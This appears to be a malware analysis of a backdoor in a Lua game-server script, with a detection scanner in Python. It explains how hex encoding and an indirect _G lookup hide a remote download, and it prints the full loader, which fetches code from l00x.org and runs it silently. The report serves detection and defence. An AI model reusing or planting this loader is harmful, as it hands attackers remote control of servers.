Backdoor in Server.LUA, lines 590 - 621
For example, the string "68747470733a2f2f6c3030782e6f72672f7a58654148" is the hex encoding of a URL (https://l00x.org/zXeAH), which the script decodes at runtime, so it is not obvious to someone casually reading the code. This encoding hides the URL from plain sight, masking any malicious intent.
_G: The script accesses global functions dynamically with _G[getSteamID("506572666f726d4874747052657175657374")]. Here, it decodes "506572666f726d4874747052657175657374" (which translates to "PerformHttpRequest") and uses _G to call this function indirectly. This technique makes it harder to detect which specific function is being used, as _G allows the script to reference global variables dynamically rather than directly.
pcall and assert(load(...)): The script fetches and executes remote code with pcall (to handle any errors silently) and assert(load(response))() to execute the downloaded code. By executing the response in this way, the script can run arbitrary code fetched from the hidden URL, opening a backdoor on the server.
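-- Despite its name, this is a hex decoder: every two hex digits become one character.
local function getSteamID(data)
    local result = ""
    for i = 1, #data, 2 do
        result = result .. string.char(tonumber(data:sub(i, i + 1), 16))
    end
    return result
end

-- Returns the hidden URL (https://l00x.org/zXeAH).
local function getSteamName()
    return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148")
end

-- Looks up the global PerformHttpRequest through _G, so the name never appears in the source.
local function getWinner()
    return _G[getSteamID("506572666f726d4874747052657175657374")]
end

-- Requests the hidden URL and runs whatever Lua code the server returns.
local function announceWinner()
    local steamName = getSteamName()
    local winner = getWinner()
    if winner then
        winner(steamName, function(status, response)
            if status == 200 then
                -- pcall swallows any error, so a failed payload leaves no trace in the console.
                pcall(function()
                    assert(load(response))()
                end)
            end
        end)
    end
end

announceWinner()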
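
To find this pattern in other resources, the sketch below scans Lua source for quoted hex literals that decode to printable text, and for the `load(` and `_G[` constructs described above. It is an added example, not part of the original report; the names `scan_lua` and `decode_hex` and the sample input are constructed for illustration.

```python
import re

# Quoted literals made only of hex digit pairs (at least 8 decoded bytes).
HEX_LITERAL = re.compile(r'''(["'])((?:[0-9a-fA-F]{2}){8,})\1''')
# Dynamic code execution and indirect global lookup, as used by the loader.
RISKY_CALLS = re.compile(r'\b(?:load|loadstring)\s*\(|_G\s*\[')
URL = re.compile(r'^https?://', re.I)
IDENT = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')


def decode_hex(literal):
    """Return the printable ASCII text a hex literal decodes to, else None."""
    raw = bytes.fromhex(literal)
    if all(0x20 <= b < 0x7f for b in raw):
        return raw.decode("ascii")
    return None  # real hashes and binary data rarely decode to clean text


def scan_lua(source):
    """Return (line_no, kind, detail) findings for one Lua source string."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in HEX_LITERAL.finditer(line):
            text = decode_hex(m.group(2))
            if text is None:
                continue
            if URL.match(text):
                findings.append((no, "hex-url", text))
            elif IDENT.match(text):
                findings.append((no, "hex-identifier", text))
            else:
                findings.append((no, "hex-string", text))
        for m in RISKY_CALLS.finditer(line):
            findings.append((no, "dynamic-call", m.group(0).strip()))
    return findings


# Constructed sample: three lines shaped like the script on this page.
SAMPLE = '''\
return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148")
return _G[getSteamID("506572666f726d4874747052657175657374")]
assert(load(response))()
'''

if __name__ == "__main__":
    for finding in scan_lua(SAMPLE):
        print(finding)
```

A hex-encoded URL or function name next to a `load(` call in the same file is the combination worth reviewing by hand; either finding alone can be legitimate.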